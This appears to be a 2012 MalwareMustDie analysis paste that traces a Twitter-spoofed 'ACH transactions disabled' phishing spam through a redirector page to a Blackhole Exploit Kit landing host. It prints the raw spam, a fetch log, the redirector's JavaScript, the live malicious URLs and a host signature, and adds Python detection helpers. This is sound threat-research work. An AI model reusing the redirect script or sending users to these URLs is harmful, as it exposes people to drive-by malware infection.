MalwareMustDie

#MalwareMustDie - Spam to BHEK to xxxx

Dec 26th, 2012
=====================================
#MalwareMustDie - A quest
Spam to BHEK to ...

=====================================

// Following "Twitter security"-lookalike spams:
// hint & follow by Ken Pryor

// Spam in original format (txt)

Delivered-To: xxxxx@xxxxx.com
Received: by 10.216.95.198 with SMTP id p48csp285246wef;
        Wed, 26 Dec 2012 06:58:12 -0800 (PST)
X-Received: by 10.182.36.8 with SMTP id m8mr22507914obj.93.1356533891842;
        Wed, 26 Dec 2012 06:58:11 -0800 (PST)
Return-Path: <JuniorGastelum@schmitt-title.com>
Received: from ????-?? ([92.46.240.84])
        by mx.google.com with ESMTP id y4si7207599obv.81.2012.12.26.06.58.08;
        Wed, 26 Dec 2012 06:58:11 -0800 (PST)
Received-SPF: softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) client-ip=92.46.240.84;
Authentication-Results: mx.google.com; spf=softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) smtp.mail=JuniorGastelum@schmitt-title.com
Received: from ham-cannon.twitter.com ([199.59.148.236]) by schmitt-title.com;
     Wed, 26 Dec 2012 03:58:10 +0600
Date: Wed, 26 Dec 2012 03:58:10 +0600
From: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
Reply-To: noreply@postmaster.twitter.com
To: xxxxx@xxxxx.com
Message-Id: <1KC8PY8L49UMD_TPA1QU8PAABSYQ9C03@522357004.twitter.com.tmail>
Subject: Re: Banking security update.
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary=mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
X-Campaignid: twitter51056991109478
X-Twitterimpressionid: am-57174748899437484147607592
Errors-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
Bounces-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
Return-Path: c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com
X-OriginalArrivalTime: Wed, 26 Dec 2012 03:58:10 +0600 FILETIME=[726C4133:38072607]

--mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

Dear Online Account Operator,

Your ACH  transactions have been
temporarily disabled.
 View details

Best regards,
Security department


--mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit


<html>
  <body >
Dear Online Account Operator, <br><br>
Your ACH  transactions have been <br>
temporarily disabled. <br>
 <a href="http://www.bibliotekarz.pl/sites/all/themes/mail2.htm">View details </a><br><br>

Best regards,<br>
Security department<br><br><br><br><br>

</body>
</html>
--mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51--

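// Added example, not part of the original paste: a small Python header triage that flags what is visible in the headers above. It reports the SPF softfail, the Return-Path domain (schmitt-title.com) disagreeing with the From domain (postmaster.twitter.com), and the "Received: from ham-cannon.twitter.com" hop, which was recorded by schmitt-title.com rather than by the receiving MX and so is only the sender's claim. The sample headers are the ones above, trimmed; the function names and the our_mx parameter (the MX whose Received line is trusted) are my assumptions.

```python
import email
import re
from email.utils import parseaddr

# Sample input: the relevant headers of the spam above, trimmed to what the checks need.
SAMPLE_HEADERS = """\
Return-Path: <JuniorGastelum@schmitt-title.com>
Received: from ????-?? ([92.46.240.84])
        by mx.google.com with ESMTP id y4si7207599obv.81.2012.12.26.06.58.08;
        Wed, 26 Dec 2012 06:58:11 -0800 (PST)
Received-SPF: softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) client-ip=92.46.240.84;
Received: from ham-cannon.twitter.com ([199.59.148.236]) by schmitt-title.com;
     Wed, 26 Dec 2012 03:58:10 +0600
From: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
Reply-To: noreply@postmaster.twitter.com
Subject: Re: Banking security update.

(body omitted)
"""

HOP_RE = re.compile(r"from\s+(\S+).*?\bby\s+(\S+)", re.S)  # "from <host> ... by <relay>"


def domain_of(header_value):
    """Bare domain of an address header, e.g. 'Twitter <x@postmaster.twitter.com>'."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def triage(raw, our_mx=("mx.google.com",)):
    """Return the sorted indicator names found in the headers of one raw message.
    our_mx (assumed parameter) lists the receiving MX whose Received line we trust."""
    msg = email.message_from_string(raw)
    findings = set()
    from_dom = domain_of(msg.get("From"))
    brand = ".".join(from_dom.split(".")[-2:])       # postmaster.twitter.com -> twitter.com

    spf = (msg.get("Received-SPF") or "").split(" ", 1)[0].lower()
    if spf in ("softfail", "fail"):
        findings.add("spf_" + spf)
    if domain_of(msg.get("Return-Path")) != from_dom:
        findings.add("return_path_mismatch")

    # Received lines read top-down, newest first: only the hop our own MX wrote is
    # verifiable; a "from <brand host>" recorded by any other relay is the sender's claim.
    for rcvd in msg.get_all("Received", []):
        m = HOP_RE.search(rcvd)
        if not m:
            continue
        src, relay = m.group(1).lower(), m.group(2).lower().rstrip(";")
        if brand and src.endswith(brand) and relay not in our_mx:
            findings.add("brand_hop_via_untrusted_relay")
    return sorted(findings)
```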

// fetch the stuff. Tip: use the spoofed sender's domain (here twitter.com) as the Referer

--2012-12-27 02:24:45--  http://www.bibliotekarz.pl/sites/all/themes/mail2.htm
Resolving www.bibliotekarz.pl (www.bibliotekarz.pl)... 194.181.21.145
Caching www.bibliotekarz.pl => 194.181.21.145
Connecting to www.bibliotekarz.pl (www.bibliotekarz.pl)|194.181.21.145|:80... connected.
Created socket 3.
Releasing 0x28804160 (new refcount 1).

---request begin---
GET /sites/all/themes/mail2.htm HTTP/1.1
Referer: http://twitter.com
User-Agent: MalwareMustDie is painting red X-mark on your door!
Accept: */*
Host: www.bibliotekarz.pl
Connection: Keep-Alive

---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Wed, 26 Dec 2012 16:16:06 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 PHP/5.2.14
Last-Modified: Wed, 26 Dec 2012 16:07:02 GMT
ETag: "250ef8-1a7-4d1c39eecf580"
Accept-Ranges: bytes
Content-Length: 423
Cache-Control: max-age=1209600
Expires: Wed, 09 Jan 2013 16:16:06 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

---response end---
200 OK
Saving to: `mail2.htm'
2012-12-27 02:24:47 (8.08 MB/s) - `mail2.htm' saved [423/423]


// See the inside....

@unixfreaxjp /malware]$ cat mail2.htm
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="http://bunakaranka.ru:8080/forum/links/column.php";}
</script>

</body>


// LANDING PAGE:

 http://bunakaranka.ru:8080/forum/links/column.php

// Blackhole PoC:

Resolving bunakaranka.ru (bunakaranka.ru)... 210.71.250.131, 187.85.160.106, 91.224.135.20
Caching bunakaranka.ru => 210.71.250.131 187.85.160.106 91.224.135.20
Connecting to bunakaranka.ru (bunakaranka.ru)|210.71.250.131|:8080... connected.

// This host's pattern/signatures (response headers):
Server: nginx/1.0.10
Date: Wed, 26 Dec 2012 17:30:46 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
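// Added example covering the two hops above (redirector page and landing host); it is my code, not part of the original paste. extract_redirects pulls the destination out of a fetched "Please wait" page and reports whether its if(var1==var2) guard is a decoy (var2 is just a copy of var1, so the branch always runs), and landing_signature_hits scores a response-header set against the three header values listed above. Samples are copied from the page; the regexes and function names are assumptions, and the PHP pattern is generalised from the one 5.3.18 dotdeb build shown.

```python
import re

# Sample input copied from the mail2.htm dump above, trimmed to the redirect script.
REDIRECTOR_HTML = """<html><body><h1>Please wait a moment ... You will be forwarded... </h1>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="http://bunakaranka.ru:8080/forum/links/column.php";}
</script>
</body></html>"""

# Sample input: the landing-page response headers quoted above, as a dict.
LANDING_HEADERS = {"Server": "nginx/1.0.10", "Content-Type": "text/html; charset=CP-1251",
                   "X-Powered-By": "PHP/5.3.18-1~dotdeb.0"}

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
ASSIGN_RE = re.compile(r"\b(\w+)\s*=\s*(\w+)\s*;")                 # name = literal-or-name ;
GUARD_RE = re.compile(r"if\s*\(\s*(\w+)\s*==\s*(\w+)\s*\)")
LOCATION_RE = re.compile(r"""\b(?:(?:document|window)\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""")
LANDING_SIGNATURE = {"server": r"^nginx/1\.0\.10$",                 # values quoted on the page;
                     "content-type": r"charset=CP-1251",            # PHP patch level generalised
                     "x-powered-by": r"^PHP/5\.3\.\d+-\d+~dotdeb\.0$"}


def _resolve(name, env):
    """Follow var2=var1, var1=49 back to the literal it aliases (stops on cycles)."""
    seen = set()
    while name in env and name not in seen:
        seen.add(name)
        name = env[name]
    return name


def extract_redirects(html):
    """Return [(url, decoy_guard)] for each script-driven redirect; decoy_guard is True
    when an if(a==b) compares two names that resolve to the same literal (always taken)."""
    found = []
    for script in SCRIPT_RE.findall(html):
        env = dict(ASSIGN_RE.findall(script))
        decoy_guard = any(_resolve(a, env) == _resolve(b, env)
                          for a, b in GUARD_RE.findall(script))
        found.extend((url, decoy_guard) for url in LOCATION_RE.findall(script))
    return found


def landing_signature_hits(headers):
    """Names of the response headers that match the Blackhole host pattern above."""
    lower = {k.lower(): v for k, v in headers.items()}
    return [h for h, pat in LANDING_SIGNATURE.items() if re.search(pat, lower.get(h, ""), re.I)]
```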


// You know the drill from here; just follow the guidance posts on malwaremustdie.blogspot.com!

---
MalwareMustDie - Dec 26th 2012